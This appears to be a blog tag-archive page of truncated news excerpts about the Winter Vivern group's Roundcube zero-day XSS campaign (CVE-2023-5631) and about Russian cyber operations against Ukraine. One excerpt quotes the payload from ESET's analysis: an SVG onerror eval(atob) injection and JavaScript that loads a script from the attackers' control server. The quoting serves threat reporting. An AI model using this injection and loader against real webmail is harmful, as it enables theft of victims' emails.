Tag Archive for: Winter

Winter Vivern: Zero-Day XSS Exploit Targets Roundcube Servers

/in


ESET Research has discovered a significant cybersecurity threat as the Winter Vivern group exploited a zero-day cross-site scripting (XSS) vulnerability in the Roundcube Webmail server. 

The new campaign, described in an advisory published today, targeted Roundcube Webmail servers of governmental entities and a think tank in Europe. ESET Research promptly reported the vulnerability to the Roundcube team on October 12, and the team acknowledged and patched it within a short timeframe, releasing security updates on October 16.

Winter Vivern, a cyber-espionage group known for targeting governments in Europe and Central Asia, has been active since at least 2020. To infiltrate its targets, the group employs various methods, including malicious documents, phishing websites and a custom PowerShell backdoor. It is suspected of being linked to MoustachedBouncer, a Belarus-aligned group.

Read more about this threat: ESET Unmasks Cyber-Espionage Group Targeting Embassies in Belarus

This is not the first time Winter Vivern has targeted Roundcube servers; in 2022, the group exploited CVE-2020-35730. Sednit, also known as APT28, has been targeting the same vulnerability as well.

The newly exploited XSS vulnerability, CVE-2023-5631, allows remote exploitation by sending a specially crafted email message. Even fully patched Roundcube instances were vulnerable due to a server-side script flaw in rcube_washtml.php, which the attackers exploited.

By sending this email, attackers could inject arbitrary JavaScript code into the victim’s Roundcube session, ultimately enabling them to access and exfiltrate email messages. ESET warned that Winter Vivern’s ability to exploit a zero-day vulnerability in Roundcube represents a concerning development in the realm of cyber-espionage.

Winter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. Previously, it was using known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online,” reads the advisory.

“Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and…

Source…

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail

/in


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Jump to:

Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A

figure A ESET Roundcube.
Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, a SVG tag contains a base64-encoded malicious payload; this is hidden for the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The goal of the malicious code is to trigger the onerror attribute by using an invalid URL in the x parameter.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to ” … properly sanitize the malicious SVG…

Source…

Winter Vivern APT Blasts Webmail Zero-Day Bug With One-Click Exploit

/in


Low-profile threat group Winter Vivern has been exploiting a zero-day flaw in Roundcube Webmail servers with a malicious email campaign targeting governmental organizations and a think tank in Europe that requires only that a user view a message.

Earlier this month, researchers at ESET Research observed the group sending a specially crafted email message that loads an arbitrary JavaScript code in the context of the Roundcube user’s browser window to exploit a newly discovered cross-site scripting (XSS) flaw tracked as CVE-2023-5631. The one-click exploit requires no manual interaction on the part of the user other than viewing the message in a Web browser, the researchers reported in a blog post published Oct. 25.

Roundcube is a freely available, open source webmail solution that’s especially popular with small-to-midsize organizations. The flaw affects versions before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4, and allows for stored XSS via an HTML email message with a crafted SVG document due to the behavior of “program/lib/Roundcube/rcube_washtml.php,” according to its CVE listing. This, in turn, allows a remote attacker to load arbitrary JavaScript code.

ESET Research reported the vulnerability to the Roundcube team on Oct. 12 and received a response and patch from the company two days later on Oct. 14. On Oct. 16, Roundcube released security updates with new versions 1.6.4, 1.5.5, and 1.4.15 to address the flaw.

Long-Term Targeting

Winter Vivern’s activity is often underreported by security researchers but the group has been active since at least December 2020 and shows sympathies with Russia and Belarus, conducting cyber espionage that serves the interest of those nations. The group typically uses malicious documents, phishing websites, and a custom PowerShell backdoor to compromise its targets and may be linked to a sophisticated Belarus-aligned group MoustachedBouncer.

The latest activity observed by ESET— which has been tracking Winter Vivern closely for about a year is consistent with the group’s typical methods, though previously they exploited flaws that already were public, notes ESET Researcher Mathieu Faou.

“Since at least 2022, they have been exploiting XSS…

Source…

Preparing for a Russian cyber offensive against Ukraine this winter

/in


As we report more fully below, in the wake of Russian battlefield losses to Ukraine this fall, Moscow has intensified its multi-pronged hybrid technology approach to pressure the sources of Kyiv’s military and political support, domestic and foreign. This approach has included destructive missile and cyber strikes on civilian infrastructure in Ukraine, cyberattacks on Ukrainian and now foreign-based supply chains, and cyber-enabled influence operations[1]—intended to undermine US, EU, and NATO political support for Ukraine, and to shake the confidence and determination of Ukrainian citizens.

In recent months, cyber threat actors affiliated with Russian military intelligence have launched destructive wiper attacks against energy, water, and other critical infrastructure organizations’ networks in Ukraine as missile strikes knocked out power and water supplies to civilians across the country. Russian military operators also expanded destructive cyberactivity outside Ukraine to Poland, a critical logistics hub, in a possible attempt to disrupt the movement of weapons and supplies to the front.

Meanwhile, Russian propaganda seeks to amplify the intensity of popular dissent over energy and inflation across Europe by boosting select narratives online through state-affiliated media outlets and social media accounts to undermine elected officials and democratic institutions. To date these have had only limited public impact, but they foreshadow what may become broadening tactics during the winter ahead.

We believe these recent trends suggest that the world should be prepared for several lines of potential Russian attack in the digital domain over the course of this winter. First, we can expect a continuation of Russia’s cyber offensive against Ukrainian critical infrastructure. We should also be prepared for the possibility that Russian military intelligence actors’ recent execution of a ransomware-style attack—known as Prestige—in Poland may be a harbinger of Russia further extending cyberattacks beyond the borders of Ukraine. Such cyber operations may target those countries and companies that are providing Ukraine with vital supply chains of aid and weaponry this…

Source…